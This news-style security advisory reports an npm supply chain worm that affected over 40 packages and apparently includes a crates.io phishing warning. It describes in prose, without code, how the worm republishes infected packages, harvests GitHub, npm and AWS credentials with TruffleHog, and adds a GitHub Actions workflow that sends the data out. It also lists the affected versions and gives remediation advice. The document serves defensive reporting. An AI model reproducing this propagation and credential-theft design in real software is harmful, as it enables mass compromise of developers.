In a recent and alarming development, cybersecurity experts have identified a significant software supply chain attack targeting the npm registry. This breach has affected over 40 packages maintained by various developers, highlighting the growing vulnerabilities within open-source ecosystems.
Mechanism of the Attack
The attackers employed a sophisticated method to compromise the packages. They introduced a function named `NpmModule.updatePackage` into the affected versions. This function performs the following actions:
1. Downloads the package tarball.
2. Modifies the `package.json` file.
3. Injects a malicious script (`bundle.js`).
4. Repackages the archive.
5. Republishes it to the npm registry.
This process enables the automatic insertion of malicious code into downstream packages, thereby propagating the attack further.
Objective of the Malicious Code
The primary goal of the injected `bundle.js` script is to scan developers’ machines for sensitive information. Utilizing TruffleHog, a legitimate credential scanning tool, the script searches for various tokens and cloud credentials, including:
– `GITHUB_TOKEN`
– `NPM_TOKEN`
– `AWS_ACCESS_KEY_ID`
– `AWS_SECRET_ACCESS_KEY`
Once these credentials are identified, they are transmitted to an external server controlled by the attackers. This attack vector is effective on both Windows and Linux systems, making it particularly pervasive.
List of Affected Packages
The following packages have been identified as compromised:
– `[email protected]`
– `@ctrl/[email protected]`
– `@ctrl/[email protected]`
– `@ctrl/[email protected]`
– `@ctrl/[email protected]`
– `@ctrl/[email protected]`
– `@ctrl/[email protected]`
– `@ctrl/[email protected]`
– `@ctrl/[email protected]`
– `@ctrl/[email protected]`
– `@ctrl/[email protected]`
– `@ctrl/[email protected]`, `@4.1.2`
– `@ctrl/[email protected]`
– `@ctrl/[email protected]`
– `@ctrl/[email protected]`
– `[email protected]`
– `[email protected]`, `0.2.1`
– `[email protected]`, `5.11.1`
– `@nativescript-community/[email protected]`
– `@nativescript-community/[email protected]`
– `@nativescript-community/[email protected]`
– `@nativescript-community/[email protected]`
– `@nativescript-community/[email protected]`
– `@nativescript-community/[email protected]`
– `@nativescript-community/[email protected]`
– `@nativescript-community/[email protected]`
– `@nativescript-community/[email protected]`
– `[email protected]`
– `[email protected]`
– `[email protected]`
– `[email protected]`
– `[email protected]`
– `[email protected]`
– `[email protected]`
– `[email protected]`
– `[email protected]`
– `[email protected]`
– `[email protected]`
Response from the Community
Upon detection of these malicious packages, immediate actions were taken to mitigate the threat. A spokesperson from CrowdStrike stated:
After detecting several malicious Node Package Manager (npm) packages in the public npm registry, a third-party open source repository, we swiftly removed them and proactively rotated our keys in public registries. These packages are not used in the Falcon sensor, the platform is not impacted and customers remain protected. We are working with npm and conducting a thorough investigation.
Technical Details of the Malicious Script
The injected `bundle.js` script operates by:
1. Downloading and executing TruffleHog to scan for sensitive tokens and credentials.
2. Validating npm tokens using the `whoami` endpoint.
3. Interacting with GitHub APIs when a token is available.
4. Attempting cloud metadata discovery, which can expose short-lived credentials within cloud build agents.
Furthermore, the script exploits the developer’s credentials, such as GitHub personal access tokens, to create a GitHub Actions workflow in the `.github/workflows` directory. This workflow facilitates the exfiltration of collected data to a specified endpoint.
Recommendations for Developers
Developers are strongly advised to:
– Audit their development environments for the presence of the compromised packages.
– Rotate npm tokens and any other potentially exposed secrets.
– Implement robust security measures, including two-factor authentication, to safeguard their accounts.
It’s crucial to note that the malicious workflow persists beyond the initial host. Once committed, any future Continuous Integration (CI) run can trigger the exfiltration step from within the pipeline, where sensitive secrets and artifacts are inherently available.
Broader Implications
This incident underscores the evolving nature of supply chain attacks. The malware’s self-propagating mechanism enables automatic infection of downstream packages, leading to a cascading compromise across the ecosystem. Such attacks highlight the need for heightened vigilance and the implementation of stringent security protocols within the software development lifecycle.
Parallel Threats: crates.io Phishing Campaign
In a related development, the Rust Security Response Working Group has issued a warning about phishing emails targeting crates.io users. These emails, originating from `security@rustfoundation[.]dev`, falsely claim a compromise of the crates.io infrastructure. Recipients are urged to click on a malicious link to rotate their login information. The link directs users to a counterfeit GitHub login page designed to steal credentials. The Rust team has confirmed that these emails are malicious and are taking steps to monitor for suspicious activity and have the phishing domain taken down.
Conclusion
The recent compromise of over 40 npm packages serves as a stark reminder of the vulnerabilities inherent in software supply chains. Developers and organizations must remain vigilant, regularly audit their dependencies, and implement comprehensive security measures to protect against such sophisticated attacks.
